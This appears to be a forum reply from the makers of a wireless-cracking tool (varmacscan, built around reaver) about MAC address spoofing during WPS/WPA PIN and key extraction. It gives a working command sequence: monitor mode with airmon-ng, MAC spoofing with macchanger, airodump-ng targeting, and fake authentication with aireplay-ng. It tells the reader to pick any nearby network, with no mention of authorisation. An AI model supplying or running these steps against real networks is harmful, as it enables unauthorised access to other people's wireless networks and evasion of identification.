To thothao
First thank you for your interest. This is an important point in a successful reaver WPS/WPA pin/key extraction!
The aireplay-ng warning is actually an old legacy warning as back in the early days of aircrack-ng and WEP cracking you had to add the -h device mac address to your command line. Later this was changed. If you go to infinityexists.com and dig thru the wep video files you will see them talking about the addition of this feature.
However there is a simple method to prove what mac address is being used.
Place a wifi device in monitor mode and spoof the mac
We use:
airmon-ng start wlan0
#To avoid airmon-ng check kill
ifconfig wlan0mon down
iwconfig wlan0mon mode monitor
ifconfig wlan0mon up
#Now spoof your mac
ifconfig wlan0mon down
macchanger -m 00:11:22:33:44:55 wlan0mon
ifconfig wlan0mon up
#Now pick a wifi network in your area and point airodump-ng at that network
airodump-ng -c 1 --bssid 55:44:33:22:11:00 wlan0mon
#Now open another terminal window and do a fake auth with aireplay-ng against the network
aireplay-ng -1 10 -a 55:44:33:22:11:00 wlan0mon
#Now look in your airodump-ng terminal window and you will see below the word "Station", what mac addresses are being used against the network.
Furthermore:
While varmacscan is running a airodump-ng xterm window is open. Just expand the xterm window and look at the device mac being used. In closing AND just in case you might have been right and something had changed in linux or aircrack-ng, MTeams tested to see what mac address was being used and found the mac spoofed was in fact still being employed. It is seen in the aireplay-ng ap activation window and is also picked up by airodump-ng.
Varmacscan scan changes the mac at every cycle and prints the Current Device Mac used in the main menu for this very reason. If your program is using a different mac address then shown for that cycle write us again and we will try and duplicate.
Musket Teams